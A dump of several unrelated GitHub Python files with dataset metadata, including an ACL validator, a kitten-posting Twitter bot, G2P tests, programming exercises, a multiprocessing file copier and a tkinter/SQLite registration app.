return int(ports[0]), int(ports[1])\n except:\n pass\n\n return None, None\n\n\ndef is_ip(ip_string):\n \"\"\"Return True if the given ip_string is either an IPv4/IPv6 address or prefix.\"\"\"\n if not isinstance(ip_string, str):\n return False\n\n try:\n ipn = ipaddress.ip_network(ip_string, strict=False)\n return True\n except:\n pass\n return False\n\n\ndef get_network_list(yaml, network_string, want_ipv4=True, want_ipv6=True):\n \"\"\"Return the full list of source or destination address(es). This function resolves the\n 'source' or 'destination' field, which can either be an IP address, a Prefix, or the name\n of a Prefix List. It returns a list of ip_network() objects, including prefix. IP addresses\n will receive prefixlen /32 or /128. Optionally, want_ipv4 or want_ipv6 can be set to False\n to filter the list.\"\"\"\n\n ret = []\n if is_ip(network_string):\n ipn = ipaddress.ip_network(network_string, strict=False)\n if ipn.version == 4 and want_ipv4:\n ret = [ipn]\n if ipn.version == 6 and want_ipv6:\n ret = [ipn]\n return ret\n\n if network_string == \"any\":\n if want_ipv4:\n ret.append(ipaddress.ip_network(\"0.0.0.0/0\"))\n if want_ipv6:\n ret.append(ipaddress.ip_network(\"::/0\"))\n return ret\n\n return prefixlist.get_network_list(\n yaml, network_string, want_ipv4=want_ipv4, want_ipv6=want_ipv6\n )\n\n\ndef get_protocol(protostring):\n \"\"\"For a given protocol string, which can be either an integer or a symbolic port\n name in /etc/protocols, return the protocol number as integer, or None if it cannot\n be determined.\"\"\"\n if isinstance(protostring, int):\n return int(protostring)\n if \"any\" == protostring:\n return 0\n\n try:\n proto = int(protostring)\n if proto > 0:\n return proto\n except:\n pass\n\n try:\n proto = socket.getprotobyname(protostring)\n return proto\n except:\n pass\n\n return None\n\n\ndef network_list_has_family(network_list, version):\n \"\"\"Returns True if the given list of ip_network() elements has at least one\n element with the specified version, which can be either 4 or 6. 
Return False\n otherwise\"\"\"\n for m in network_list:\n if m.version == version:\n return True\n return False\n\n\ndef validate_acls(yaml):\n \"\"\"Validate the semantics of all YAML 'acls' entries\"\"\"\n result = True\n msgs = []\n logger = logging.getLogger(\"vppcfg.config\")\n logger.addHandler(logging.NullHandler())\n\n if not \"acls\" in yaml:\n return result, msgs\n\n for aclname, acl in yaml[\"acls\"].items():\n terms = 0\n for acl_term in acl[\"terms\"]:\n terms += 1\n orig_acl_term = acl_term.copy()\n acl_term = hydrate_term(acl_term)\n logger.debug(\n f\"acl {aclname} term {terms} orig {orig_acl_term} hydrated {acl_term}\"\n )\n if acl_term[\"family\"] == \"ipv4\":\n want_ipv4 = True\n want_ipv6 = False\n elif acl_term[\"family\"] == \"ipv6\":\n want_ipv4 = False\n want_ipv6 = True\n else:\n want_ipv4 = True\n want_ipv6 = True\n\n src_network_list = get_network_list(\n yaml, acl_term[\"source\"], want_ipv4=want_ipv4, want_ipv6=want_ipv6\n )\n dst_network_list = get_network_list(\n yaml, acl_term[\"destination\"], want_ipv4=want_ipv4, want_ipv6=want_ipv6\n )\n logger.debug(\n f\"acl {aclname} term {terms} src: {src_network_list} dst: {dst_network_list}\"\n )\n if len(src_network_list) == 0:\n msgs.append(\n f\"acl {aclname} term {terms} family {acl_term['family']} has no source\"\n )\n result = False\n if len(dst_network_list) == 0:\n msgs.append(\n f\"acl {aclname} term {terms} family {acl_term['family']} has no destination\"\n )\n result = False\n if len(dst_network_list) == 0 or len(src_network_list) == 0:\n ## Pointless to continue if there's no src/dst at all\n continue\n\n src_network_has_ipv4 = network_list_has_family(src_network_list, 4)\n dst_network_has_ipv4 = network_list_has_family(dst_network_list, 4)\n src_network_has_ipv6 = network_list_has_family(src_network_list, 6)\n dst_network_has_ipv6 = network_list_has_family(dst_network_list, 6)\n\n if (\n src_network_has_ipv4 != dst_network_has_ipv4\n and src_network_has_ipv6 != dst_network_has_ipv6\n ):\n msgs.append(\n f\"acl {aclname} term {terms} source and destination family do not overlap\"\n )\n result = False\n continue\n\n proto = get_protocol(acl_term[\"protocol\"])\n if proto is None:\n msgs.append(f\"acl {aclname} term {terms} could not understand protocol\")\n result = False\n\n if not proto in [6, 17]:\n if \"source-port\" in orig_acl_term:\n msgs.append(\n f\"acl {aclname} term {terms} source-port can only be specified for protocol tcp or udp\"\n )\n result = False\n if \"destination-port\" in orig_acl_term:\n msgs.append(\n f\"acl {aclname} term {terms} destination-port can only be specified for protocol tcp or udp\"\n )\n result = False\n else:\n src_low_port, src_high_port = get_port_low_high(acl_term[\"source-port\"])\n dst_low_port, dst_high_port = get_port_low_high(\n acl_term[\"destination-port\"]\n )\n\n if src_low_port is None or src_high_port is None:\n msgs.append(\n f\"acl {aclname} term {terms} could not understand source-port\"\n )\n result = False\n else:\n if src_low_port > src_high_port:\n msgs.append(\n f\"acl {aclname} term {terms} source-port low value is greater than high value\"\n )\n result = False\n if src_low_port < 0 or src_low_port > 65535:\n msgs.append(\n f\"acl {aclname} term {terms} source-port low value is not between [0,65535]\"\n )\n result = False\n if src_high_port < 0 or src_high_port > 65535:\n msgs.append(\n f\"acl {aclname} term {terms} source-port high value is not between [0,65535]\"\n )\n result = False\n\n if dst_low_port is None or dst_high_port is None:\n 
msgs.append(\n f\"acl {aclname} term {terms} could not understand destination-port\"\n )\n result = False\n else:\n if dst_low_port > dst_high_port:\n msgs.append(\n f\"acl {aclname} term {terms} destination-port low value is greater than high value\"\n )\n result = False\n if dst_low_port < 0 or dst_low_port > 65535:\n msgs.append(\n f\"acl {aclname} term {terms} destination-port low value is not between [0,65535]\"\n )\n result = False\n if dst_high_port < 0 or dst_high_port > 65535:\n msgs.append(\n f\"acl {aclname} term {terms} destination-port high value is not between [0,65535]\"\n )\n result = False\n\n if not proto in [1, 58]:\n if \"icmp-code\" in orig_acl_term:\n msgs.append(\n f\"acl {aclname} term {terms} icmp-code can only be specified for protocol icmp or ipv6-icmp\"\n )\n result = False\n if \"icmp-type\" in orig_acl_term:\n msgs.append(\n f\"acl {aclname} term {terms} icmp-type can only be specified for protocol icmp or ipv6-icmp\"\n )\n result = False\n else:\n icmp_code_low, icmp_code_high = get_icmp_low_high(acl_term[\"icmp-code\"])\n icmp_type_low, icmp_type_high = get_icmp_low_high(acl_term[\"icmp-type\"])\n if icmp_code_low > icmp_code_high:\n msgs.append(\n f\"acl {aclname} term {terms} icmp-code low value is greater than high value\"\n )\n result = False\n if icmp_type_low > icmp_type_high:\n msgs.append(\n f\"acl {aclname} term {terms} icmp-type low value is greater than high value\"\n )\n result = False\n\n return result, msgs\n","repo_name":"pimvanpelt/vppcfg","sub_path":"vppcfg/config/acl.py","file_name":"acl.py","file_ext":"py","file_size_in_byte":12469,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"61"} +{"seq_id":"19828661334","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 22 15:26:13 2023\n\n@author: Karin Sofi\n\"\"\"\n\nx1 = \"a\"\nx2 = -2.0\nx3 = 0.0\n\n\ndef my_func(x1, x2, x3):\n if isinstance(x1, float) and isinstance(x2, float) and isinstance(x3, float) == True:\n xT = (x1 + x2 + x3)\n up = xT * (x2 + x3) * x3\n if xT == 0:\n return 'Not a number – denominator equals zero'\n else:\n return (up / xT)\n elif isinstance(x1, int) and isinstance(x2, int) and isinstance(x3, int) == True:\n return 'Error: parameters should be float'\n else:\n return 'None'\n\n\nx = my_func(x1, x2, x3)\nprint(x)\n\n","repo_name":"KarinLevSofi/Ex1","sub_path":"Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71230629316","text":"import json\nimport asyncio\nimport sys\nimport shutil\nimport tempfile\nimport os\nimport aiohttp\n\nfrom io import StringIO\nfrom random import randint, choice\nfrom time import sleep\nfrom bs4 import BeautifulSoup # type: ignore\n\nfrom tweepy import API, OAuthHandler, TweepError # type: ignore\n\nimport utils\nimport mememaker\n\n\nasync def create_api() -> API:\n key = os.environ[\"KIITENSUPORT_ACCESS_KEY\"]\n secret = os.environ[\"KIITENSUPORT_ACCESS_SECRET\"]\n access_token = os.environ[\"KIITENSUPORT_ACCESS_TOKEN\"]\n access_token_secret = os.environ[\"KIITENSUPORT_ACCESS_TOKEN_SECRET\"]\n return await utils.create_twitter(key, secret, access_token, access_token_secret)\n\n\nasync def get_random_message():\n p = randint(1, 20)\n async with aiohttp.ClientSession() as session:\n async with session.get(f\"https://www.pensador.com/frases/{p}/\") as resp:\n if resp.status != 200:\n return\n content = await resp.text()\n soup = BeautifulSoup(content, 
\"html.parser\")\n phrase = choice(soup.find_all(\"p\", class_=\"frase\"))\n if not phrase:\n return\n author = phrase.parent.find(\"span\", class_=\"autor\").find(\"a\")\n if not author:\n return\n phrase = f\"“{phrase.get_text()}” — {author.get_text()}\"\n return phrase\n\n\nasync def get_random_kitten_image_url():\n key = os.environ[\"KIITENSUPORT_THECATAPI_KEY\"]\n url = \"https://api.thecatapi.com/v1/images/search?api_key={key}&limit=1\"\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as resp:\n if resp.status != 200:\n return\n data = await resp.json()\n if not isinstance(data, (list,)) or len(data) == 0:\n return\n return data[0].get(\"url\")\n\n\nasync def main() -> None:\n utils.log.info(\"kiitensupport bot started\")\n api = await create_api()\n while True:\n if not \"DRYRUN\" in os.environ:\n await asyncio.sleep(utils.next_hour(19).seconds)\n else:\n await asyncio.sleep(1)\n try:\n phrase = await get_random_message()\n if not phrase:\n continue\n\n kitten_url = await get_random_kitten_image_url()\n if not kitten_url:\n continue\n\n async with utils.download_image(kitten_url) as path:\n new_image_path = await mememaker.create_meme_tempfile(path, phrase)\n if not new_image_path:\n continue\n\n if not \"DRYRUN\" in os.environ:\n status = await api.update_with_media(new_image_path)\n utils.log.info(\"Posted %s\", await utils.get_tweet_url(api, status))\n else:\n utils.log.debug(\"DRYRUN, skipping\")\n except TweepError as e:\n utils.log.error(f\"TweepError %s\", e)\n except Exception as e:\n utils.log.error(\"Uncaught exception %s\", e)\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"dhilst/geckones_twitter_bots","sub_path":"kittensupport.py","file_name":"kittensupport.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"37421796709","text":"\"\"\"Tests for G2P training/application.\"\"\"\n# -*- coding: utf-8 -*-\nfrom pathlib import Path\n\nimport pytest\n\nfrom asrlex.g2p import remap_reserved_symbols, restore_reserved_symbols, G2P\nfrom asrlex.prondict import PronDict\n\n\nPARENT_DIR = Path(__file__).parent\nREF_DICT_PATH = Path(PARENT_DIR, 'sample.dict')\nREF_MODEL_PATH = Path(PARENT_DIR, 'g2p.fst')\n\nSYMS_TXT = ('right-brace} R...\\n'\n\t 'i_p_o ay...\\n'\n 'pipe| p...\\n')\nNO_SYMS_TXT = ('right-brace\\u2622 R...\\n'\n 'i\\u2695p\\u2695o ay...\\n'\n 'pipe\\u262f p...\\n')\n\ndef test_remap_reserved_symbols():\n assert NO_SYMS_TXT == remap_reserved_symbols(SYMS_TXT)\n\n\ndef test_restore_reserved_symbols():\n assert SYMS_TXT == restore_reserved_symbols(NO_SYMS_TXT)\n\n\ndef test_g2p_init():\n G2P(REF_MODEL_PATH)\n\n\ndef test_train_g2p(tmpdir):\n # Test argument checking.\n with pytest.raises(TypeError):\n G2P.train_g2p('/dev/null', PronDict(), ngram_order=1.5)\n with pytest.raises(ValueError):\n G2P.train_g2p('/dev/null', PronDict(), ngram_order=0)\n with pytest.raises(ValueError):\n G2P.train_g2p('/dev/null', PronDict(), seq1_max=0)\n with pytest.raises(ValueError):\n G2P.train_g2p('/dev/null', PronDict(), seq2_max=0)\n\n # Train model.\n pdict = PronDict.load_dict(REF_DICT_PATH)\n model_path = Path(tmpdir, 'g2p.fst')\n model = G2P.train_g2p(\n model_path, pdict, ngram_order=3, seq1_del=True, seq1_max=2,\n seq2_del=True, seq2_max=2, grow=False)\n assert model is not None\n assert model_path.exists()\n\n # Check that it generates the expected pronunciations\n expected_prons = {('dh', 'ah'), ('dh', 'iy')}\n actual_prons = 
model.get_prons('the')\n assert actual_prons == expected_prons\n\n\ndef test_g2p_get_prons():\n model = G2P(REF_MODEL_PATH)\n expected_prons = {('dh', 'ah'), ('dh', 'iy')}\n actual_prons = model.get_prons('the')\n assert actual_prons == expected_prons\n","repo_name":"nryant/asrlex","sub_path":"asrlex/tests/test_g2p.py","file_name":"test_g2p.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32407779217","text":"import sys\ninput = sys.stdin.readline\n\ndef recursive(n, c):\n\tprefix = '____' * (n - c)\n\tintro = [prefix + '\"재귀함수가 뭔가요?\"']\n\touttro = [prefix + '라고 답변하였지.']\n\tif c == 0:\n\t\tbody = [prefix + '\"재귀함수는 자기 자신을 호출하는 함수라네\"']\n\t\treturn intro + body + outtro\n\n\tbody = [prefix + '\"잘 들어보게. 옛날옛날 한 산 꼭대기에 이세상 모든 지식을 통달한 선인이 있었어.',\n\tprefix + '마을 사람들은 모두 그 선인에게 수많은 질문을 했고, 모두 지혜롭게 대답해 주었지.',\n\tprefix + '그의 답은 대부분 옳았다고 하네. 그런데 어느 날, 그 선인에게 한 선비가 찾아와서 물었어.\"']\n\treturn intro + body + recursive(n, c - 1) + outtro\n\ndef solution():\n\tn = int(input())\n\tprint(\"어느 한 컴퓨터공학과 학생이 유명한 교수님을 찾아가 물었다.\")\n\tprint('\\n'.join(recursive(n, n)))\n\nif __name__ == \"__main__\":\n\tsolution()\n","repo_name":"kim-mg/algorithm","sub_path":"baekjoon/2 recursive_function/what_is_recursive_func_17478.py","file_name":"what_is_recursive_func_17478.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23631584401","text":"#!/usr/bin/python\n\nfin = open('A-small-attempt0.in', 'r')\nfout = open('A-small.out', 'w')\n\ncyph = dict()\ncyph['a'] = 'y'\ncyph['b'] = 'h'\ncyph['c'] = 'e'\ncyph['d'] = 's'\ncyph['e'] = 'o'\ncyph['f'] = 'c'\ncyph['g'] = 'v'\ncyph['h'] = 'x'\ncyph['i'] = 'd'\ncyph['j'] = 'u'\ncyph['k'] = 'i'\ncyph['l'] = 'g'\ncyph['m'] = 'l'\ncyph['n'] = 'b'\ncyph['o'] = 'k'\ncyph['p'] = 'r'\ncyph['q'] = 'z'\ncyph['r'] = 't'\ncyph['s'] = 'n'\ncyph['t'] = 'w'\ncyph['u'] = 'j'\ncyph['v'] = 'p'\ncyph['w'] = 'f'\ncyph['x'] = 'm'\ncyph['y'] = 'a'\ncyph['z'] = 'q'\n\nT = int (fin.readline ())\n\nfor i in range ( 1, T + 1 ):\n lin = fin.readline ()\n for j in range(len(lin)):\n if lin[j] != ' ' and lin[j] != '\\n':\n #print lin[j], cyph[lin[j]]\n lin = lin[0:j] + cyph[lin[j]] + lin[j+1:]\n fout.write (\"Case #%d: %s\" % ( i, lin ) )\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_95/1738.py","file_name":"1738.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23429866681","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\nimport sys, os, re\r\n\r\nf = open('./input.txt')\r\no = open('./output.txt', 'w')\r\nT = int(f.readline())\r\n\r\ndef time_farm_or_cookie(C, F, s):\r\n\treturn C * (1 / F + 1 / s)\r\n\r\nfor case in range(1, T+1):\r\n\tn = map(float, f.readline().split(' '))\r\n\tC = n[0] # farm price\r\n\tF = n[1] # farm cookie/sec\r\n\tX = n[2] # goal\r\n\ts = 2.0 # 2 cookies/sec\r\n\tt = 0.0\r\n\tfinish = False\r\n\r\n\twhile not finish:\r\n\t\ttt = time_farm_or_cookie(C, F, s)\r\n\r\n\t\tif X <= tt * s:\r\n\t\t\tt += X / s #round(t + X / s, 7)\r\n\t\t\tfinish = True\r\n\t\telse:\r\n\t\t\tt += C / s #round(t + C / s, 7)\r\n\t\t\ts += F\r\n\r\n\tt = round(t, 7)\r\n\to.write(\"Case #%s: %s\\n\" % (case, 
t))\r\n\r\nf.close()\r\no.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/885.py","file_name":"885.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"35854010843","text":"import multiprocessing\nimport os\n\n\ndef copy_file(queue, file_name, old_folder_name, new_folder_name):\n    f_read = open(\"../\" + old_folder_name + \"/\" + file_name, 'rb')\n    f_write = open(\"../\" + new_folder_name + \"/\" + file_name, 'wb')\n    while True:\n        content = f_read.read()\n        if content:\n            f_write.write(content)\n        else:\n            break\n    f_read.close()\n    f_write.close()\n    # print(\"File copy finished!\")\n    queue.put(file_name)\n\n\ndef main():\n    # Get the name of the folder to copy\n    old_folder_name = input('Enter the name of the folder to copy: ')\n    # Build the name of the new folder\n    new_folder_name = old_folder_name + \"_copy\"\n    # Create the new folder\n    try:\n        os.mkdir(\"../\" + new_folder_name)\n    except Exception as ret:\n        print(\"Folder already exists!\")\n        pass\n    # Get the names of all files in the folder\n    file_names = os.listdir(\"../\" + old_folder_name)\n    # Create the process pool (the original comment said \"thread pool\")\n    pool = multiprocessing.Pool(3)\n    # Create the queue\n    queue = multiprocessing.Manager().Queue()\n    # Add copy tasks to the pool\n    for file_name in file_names:\n        pool.apply_async(copy_file, args=(queue, file_name, old_folder_name, new_folder_name))\n        print(file_name)\n\n    print(\"----\")\n    pool.close()\n    # pool.join()\n    all_file_nums = len(file_names)\n    while True:\n        get_file_name = queue.get()\n        if get_file_name in file_names:\n            file_names.remove(get_file_name)\n\n        copy_rate = 1 - len(file_names) / all_file_nums\n        # report the file just taken from the queue (the original reused the stale loop variable file_name)\n        print(\"\\r%.2f...(%s)\" % (copy_rate, get_file_name) + \" \" * 50, end=\"\")\n        if copy_rate >= 1:\n            break\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"MakaiX/python_learn","sub_path":"04_process/file_copy.py","file_name":"file_copy.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27805065601","text":"from tkinter import *\r\nfrom tkinter.messagebox import *\r\nfrom tkinter import ttk\r\nimport sqlite3\r\nimport re\r\n\r\n# Declaramos el main de la app y seteamos la app\r\nmain = Tk()\r\nmain.title(\"System UTNBA\")\r\nmain.configure(bg='#F0F7DA')\r\ntitulo = Label(main, text=\"System UTNBA\", width=80, foreground='#F0F7DA', bg='#1F192F', font='Arial 15 bold').grid(pady=10, row=0, columnspan=6)\r\nfuentetit = 'Mooli 12'\r\nfuentecue = 'Roboto-Medium 10'\r\npatrondni = \"^[0-9]+(?i:[ _-][0-9]+)*$\"\r\n\r\n# Comenzamos a definir todas las funciones que usara la aplicacion\r\ndef creartabla():\r\n    global cursor\r\n    global db\r\n    db = sqlite3.connect(\"baseTPinicial.db\")\r\n    cursor = db.cursor()\r\n    sql = \"CREATE TABLE IF NOT EXISTS personas(id INTEGER PRIMARY KEY AUTOINCREMENT, nombre VARCHAR(50) NOT NULL, apellido VARCHAR(50) NOT NULL, documento INT NOT NULL, correo VARCHAR(50) NOT NULL, filiacion VARCHAR(50))\"\r\n    cursor.execute(sql)\r\n    db.commit()\r\n\r\n\r\ndef regpersona():\r\n    patron = \"^[A-Za-z]+(?i:[ _-][A-Za-z]+)*$\"\r\n    patroncorreo = \"^[A-Za-z]+@\"\r\n    if (re.match(patrondni, var_dni.get())):\r\n        if (re.match(patroncorreo, var_correo.get())):\r\n            if (re.match(patron, var_nombre.get()) and re.match(patron, var_apellido.get())):\r\n                resultadodni = busquedadni(var_dni.get())\r\n                if (resultadodni ==[]):\r\n                    sql = \"INSERT INTO personas (nombre, apellido, documento, correo, filiacion) VALUES (?,?,?,?,?)\"\r\n                    datos = (var_nombre.get(),var_apellido.get(),var_dni.get(),var_correo.get(),combo.get())\r\n                    cursor.execute(sql, datos)\r\n                    
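# Illustrative sketch (not part of the original records): the farm-buying rule
# behind the Code Jam solution above. Buying a farm pays off exactly when
#   C/s + X/(s + F) < X/s, i.e. X > C*(s + F)/F,
# which the solution encodes as comparing X against tt*s with tt = C*(1/F + 1/s).
def should_buy_farm(C, F, s, X):
    return X > C * (s + F) / F

# With C=30, F=1, s=2 the threshold is 30*3/1 = 90 cookies:
assert should_buy_farm(30.0, 1.0, 2.0, 100.0)
assert not should_buy_farm(30.0, 1.0, 2.0, 90.0)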
db.commit()\r\n mostrardb()\r\n limpiar()\r\n else:\r\n showwarning(\"Error\", \"El dni ingresado ya existe en la base, ingrese otro\")\r\n else:\r\n showerror(\"Error\", \"No es posible guardar\")\r\n else:\r\n showwarning(\"Error\", \"Por favor ingrese un correo electronico correcto\")\r\n else:\r\n showwarning(\"Error\", \"Por favor ingrese un valor numerico en DNI\")\r\n\r\n\r\ndef busquedadni(var):\r\n sql = \"SELECT * FROM personas WHERE documento = \" + var\r\n cursor.execute(sql)\r\n resultado = cursor.fetchall()\r\n return resultado\r\n\r\n\r\ndef conspersona():\r\n if (re.match(patrondni, var_dnic.get())):\r\n resultado = busquedadni(var_dnic.get())\r\n if resultado !=[] :\r\n showinfo(\"El resultado es:\", resultado)\r\n var_dnic.set('')\r\n else:\r\n showerror(\"Error\", \"El dni ingesado no existe en la base de datos\")\r\n else:\r\n showwarning(\"Error\", \"Por favor ingrese un valor valido\")\r\n\r\n\r\ndef modpersona():\r\n global botonmod\r\n if (re.match(patrondni, var_dnic.get())):\r\n resultado = busquedadni(var_dnic.get())\r\n if resultado !=[]:\r\n sql = \"SELECT * FROM personas WHERE documento = \" + var_dnic.get()\r\n cursor.execute(sql)\r\n persona = cursor.fetchone()\r\n var_nombre.set(persona[1])\r\n var_apellido.set(persona[2])\r\n var_dni.set(persona[3])\r\n var_correo.set(persona[4])\r\n combo.set(persona[5])\r\n botonmod = Button(main, text=\" Modificar \", bg='#C1FD53',font=fuentecue, command=modificarendb)\r\n botonmod.grid(row=7, column=1, columnspan=2)\r\n else:\r\n showerror(\"Error\", \"El dni ingesado no existe en la base de datos\")\r\n else:\r\n showwarning(\"Error\", \"Por favor ingrese un valor numerico\")\r\n\r\n\r\ndef modificarendb():\r\n if askyesno(\"Modificar persona\", \"¿Esta seguro que desea modificar esta persona?\"):\r\n sql = \"UPDATE personas SET nombre=?, apellido=?, documento=?, correo=?, filiacion=? 
WHERE documento = \" + var_dnic.get()\r\n datos = (var_nombre.get(),var_apellido.get(),var_dni.get(),var_correo.get(),combo.get())\r\n cursor.execute(sql, datos)\r\n db.commit()\r\n mostrardb()\r\n limpiar()\r\n var_dnic.set('')\r\n else:\r\n showinfo(\"Salir\", \"Esta a punto de salir\")\r\n botonmod.destroy()\r\n limpiar()\r\n\r\n\r\ndef eliminarpersona():\r\n if (re.match(patrondni, var_dnic.get())):\r\n resultado = busquedadni(var_dnic.get())\r\n if resultado !=[]:\r\n if askyesno(\"Eliminar persona\", \"Esta seguro que desea eliminar esta persona\"):\r\n sql = \"DELETE FROM personas WHERE documento = \" + var_dnic.get()\r\n cursor.execute(sql)\r\n db.commit()\r\n mostrardb()\r\n var_dnic.set('')\r\n showinfo(\"Eliminar\", \"Usuario eliminado\")\r\n else:\r\n showinfo(\"Salir\", \"Esta a punto de salir\")\r\n else:\r\n showerror(\"Error\", \"El dni ingesado no existe en la base de datos\")\r\n else:\r\n showwarning(\"Error\", \"Por favor ingrese un valor numerico\")\r\n\r\n\r\ndef limpiar():\r\n var_nombre.set('')\r\n var_apellido.set('')\r\n var_dni.set('')\r\n var_correo.set('')\r\n combo.set('')\r\n\r\n\r\ndef mostrardb():\r\n sql = \"SELECT * FROM personas\"\r\n cursor.execute(sql)\r\n resultado = cursor.fetchall()\r\n registros = tree.get_children()\r\n for x in registros:\r\n tree.delete(x)\r\n for i in resultado:\r\n tree.insert(\"\", 'end', values=i)\r\n\r\n\r\n# VARIABLES\r\nvar_nombre = StringVar()\r\nvar_apellido = StringVar()\r\nvar_dni = StringVar()\r\nvar_correo = StringVar()\r\nvar_dnic = StringVar()\r\n# ---------- ALTA DE REGISTRO ---------------------------\r\nregistrasetitulo = Label(main, text=\"Registrarse\", bg='#F0F7DA', font=fuentetit).grid(pady=10,row=1, column=1, columnspan=2)\r\nnombre = Label(main, text=\"Nombre\", bg='#F0F7DA', font=fuentecue).grid(column=1, row=2)\r\nnombreentry = Entry(main, textvariable=var_nombre).grid(column=2, row=2)\r\n\r\napellido = Label(main, text=\"Apellido\", bg='#F0F7DA', font=fuentecue).grid(column=1, row=3)\r\napellidoentry = Entry(main,textvariable=var_apellido).grid(column=2, row=3)\r\n\r\ndni = Label(main, text=\"Dni\", bg='#F0F7DA', font=fuentecue).grid(column=1, row=4)\r\ndnientry = Entry(main,textvariable=var_dni).grid(column=2, row=4)\r\n\r\ncorreo = Label(main, text=\"Correo\", bg='#F0F7DA', font=fuentecue).grid(column=1, row=5)\r\ncorreoentry = Entry(main,textvariable=var_correo).grid(column=2, row=5)\r\n\r\nfiliacion = Label(main, text=\"Filiacion\",bg='#F0F7DA', font=fuentecue).grid(column=1, row=6, pady=3)\r\n\r\nboton_reg = Button(main, text=\"Registrar\", bg='#65B8A6', command=regpersona, font=fuentecue).grid(pady=10, row=7, column=1, columnspan=2)\r\n\r\ncombo = ttk.Combobox(\r\n state=\"readonly\",\r\n values=[\"Docente\", \"No Docente\", \"Alumno\", \"Monotributista\"]\r\n)\r\ncombo.grid(column=2,row=6)\r\n\r\n# INPUT MODIFICACION/CONSULTA\r\nconsultatitulo = Label(main, text=\"Consulta\", bg='#F0F7DA', font=fuentetit).grid(pady=10, row=1, column=3, columnspan=2)\r\ndniconsulta = Label(main, text=\"Ingrese Documento\", bg='#F0F7DA', font=fuentecue).grid(column=3, row=2)\r\ndniconsultaentry = Entry(main, textvariable=var_dnic).grid(column=4, row=2 )\r\n\r\nboton_con = Button(main, text=\"Consultar\", bg='#8BE83F', command=conspersona, font=fuentecue).grid(column=3, row=4, columnspan=2)\r\nboton_mod = Button(main, text=\"Modificar\", bg='#66E8CA', command=modpersona, font=fuentecue).grid(row=3, column=3)\r\nboton_eli = Button(main, text=\"Eliminar\", bg='#FF542B', command=eliminarpersona, 
font=fuentecue).grid(row=3, column=4)\r\n\r\n\r\n\r\n# MUESTRA DE BASE\r\ntree = ttk.Treeview(main, show=\"headings\")\r\ntree[\"columns\"] = (\"1\", \"2\", \"3\", \"4\", \"5\", \"6\")\r\ntree.column(\"1\", minwidth=40, anchor=\"n\")\r\ntree.column(\"2\", minwidth=80, anchor=\"n\")\r\ntree.column(\"3\", minwidth=80, anchor=\"n\")\r\ntree.column(\"4\", minwidth=60, anchor=\"n\")\r\ntree.column(\"5\", minwidth=60, anchor=\"n\")\r\ntree.column(\"6\", minwidth=60, anchor=\"n\")\r\n\r\n\r\n# Encabezado de las columnas del Treeview\r\ntree.heading(\"1\", text=\"ID\", anchor=\"n\")\r\ntree.heading(\"2\", text=\"Nombre\", anchor=\"n\")\r\ntree.heading(\"3\", text=\"Apellido\", anchor=\"n\")\r\ntree.heading(\"4\", text=\"Dni\", anchor=\"n\")\r\ntree.heading(\"5\", text=\"Correo\", anchor=\"n\")\r\ntree.heading(\"6\", text=\"Filiacion\", anchor=\"n\")\r\ntree.grid(row=9, columnspan=6, pady=5)\r\n\r\n\r\n\r\n\r\ncreartabla()\r\nmostrardb()\r\nmain.mainloop()\r\n","repo_name":"Maurodifi/Pythontpinicial","sub_path":"tp_inicial.py","file_name":"tp_inicial.py","file_ext":"py","file_size_in_byte":8144,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70835798595","text":"from weapon import Weapon\n\n\nclass Robot:\n\n    def __init__(self, name, health, robot_weapon):\n        self.robot_name = name\n        self.robot_health = health\n        self.robot_weapon = robot_weapon\n\n    def robot_attack(self, dino):\n        # Damage the dinosaur passed in; the original decremented self.dino_health,\n        # which Robot never defines. Assumes the Dinosaur class keeps its health in dino_health.\n        dino.dino_health -= self.robot_weapon.attack_power\n\n\n\n# These were created to ensure that my init was functional, but they won't be used when\n# importing; the init will be the only thing used. They can also serve as a quick reference.\nrobot_weapon = Weapon(\"Stun Gun\", 30)\nrobot_1 = Robot(\"Brave Little Toaster\", 130, robot_weapon)\n\nrobot_weapon = Weapon(\"Beam Rifle\", 45)\nrobot_2 = Robot(\"The Iron Giant\", 100, robot_weapon)\n\nrobot_weapon = Weapon(\"Rocket\", 55)\nrobot_3 = Robot(\"Bender\", 75, robot_weapon)\n\n\n\n# Copy and bring these over to the fleet for the list that you want created; you will need to append() to add them to the list.\n# If not sure about the . 
notation, throw a breakpoint and watch where it runs.","repo_name":"ZacharyGoolman/robotd_vs_dinos","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
